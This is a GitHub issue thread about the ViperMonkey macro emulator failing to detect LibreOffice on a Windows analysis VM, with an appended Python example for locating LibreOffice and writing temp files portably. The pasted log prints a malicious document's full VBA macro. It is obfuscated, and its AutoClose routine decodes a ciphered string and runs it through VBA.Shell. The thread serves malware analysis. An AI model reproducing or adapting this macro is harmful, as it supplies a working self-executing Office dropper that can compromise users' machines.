Vipermonkey says LibreOffice not installed, but it is
opticoax747 opened this issue · 4 comments
Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.
LibreOffice is installed, but Vipermonkey doesn't see it and errors out.
FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm
INFO Starting emulation...
INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.
INFO Reading document metadata...
WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file
ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified
ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook
ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/
INFO Parsing VB...
Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
VBA CODE (with long lines collapsed):
Sub AutoClose()
roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P")
totoro = ceraunogram(roans)
Application.Run "chillumchee", (totoro)
End Sub
Private Sub chillumchee(brothy)
declination = 6162
samoan = True
While samoan
boneblack = declination + 222
If boneblack - declination > 111 Then
VBA.Shell brothy, vbNormalFocus - 1
samoan = False
End If
Wend
End Sub
Public Function trinely(germaneness, preludium)
russophobist = 9090
categoryator = -1
For Each drolled In preludium
If drolled = germaneness Then
russophobist = categoryator
Exit For
End If
categoryator = categoryator + 1
Next
If russophobist = 9090 Then
russophobist = -1
End If
trinely = russophobist + 1
End Function
Private Function ceraunogram(roans)
malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l")
roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")
erasable = vbNullString
For Each paraphrenic In roans
ore = Application.Run("trinely", paraphrenic, malope)
If ore > -1 And ore < 8080 Then
erasable = roughhoused(ore) + erasable
End If
Next
ceraunogram = StrReverse(erasable)
End Function
PARSING VBA CODE:
INFO parsed Sub AutoClose (): 3 statement(s)
INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s)
INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s)
INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s)
INFO Reading document variables...
INFO Reading Shapes object text fields...
Traceback (most recent call last):
File "vmonkey.py", line 1311, in _process_file
shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument')
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values
r = _get_shapes_text_values_2007(fname)
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007
f = open(tmp_name, 'wb')
IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office'
ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'
c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey
I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.
OK, I will try to get a licensed version of Word on Windows? Would that be better?
No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time), is to improve the code so that it can work with LibreOffice on Windows too.
I did hardcode the path to Windows Libre Office into the .py, but it still errored out.
I think my office will give me a Word license...
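The two failures discussed in this thread (the hard-coded `/tmp` scratch path in the traceback and LibreOffice not being found on Windows) can both be handled portably. The following is an added example, not ViperMonkey's own code and not part of the thread. It assumes Python 3 and the default LibreOffice install layout under Program Files; the function names are hypothetical.

```python
import os
import shutil
import subprocess
import tempfile


def find_soffice(env=None, which=shutil.which):
    """Return the path of LibreOffice's soffice binary, or None if absent."""
    env = os.environ if env is None else env
    # 1. Anything already on PATH (typical on Linux, optional on Windows).
    for name in ("soffice", "libreoffice"):
        found = which(name)
        if found:
            return found
    # 2. Assumed default Windows install location under Program Files.
    for var in ("ProgramFiles", "ProgramFiles(x86)"):
        base = env.get(var)
        if base:
            candidate = os.path.join(base, "LibreOffice", "program", "soffice.exe")
            if os.path.isfile(candidate):
                return candidate
    return None


def write_scratch_copy(data, suffix=".office"):
    """Write bytes to a new file in the platform temp directory."""
    # mkstemp picks the temp dir from TMPDIR/TEMP/TMP, so no hard-coded /tmp,
    # and creates the file exclusively with owner-only permissions.
    fd, path = tempfile.mkstemp(prefix="vmonkey_", suffix=suffix)
    with os.fdopen(fd, "wb") as handle:
        handle.write(data)
    return path


def convert_with_libreoffice(data, out_dir, fmt="csv"):
    """Convert sample bytes headlessly; raise if LibreOffice is missing."""
    soffice = find_soffice()
    if soffice is None:
        raise RuntimeError("LibreOffice not found on PATH or in Program Files")
    scratch = write_scratch_copy(data)
    try:
        # Argument list, no shell: the sample's file name is never parsed.
        subprocess.run([soffice, "--headless", "--convert-to", fmt,
                        "--outdir", out_dir, scratch], check=True, timeout=120)
    finally:
        os.remove(scratch)
```

Run the conversion only inside the analysis VM, since LibreOffice is opening an untrusted document.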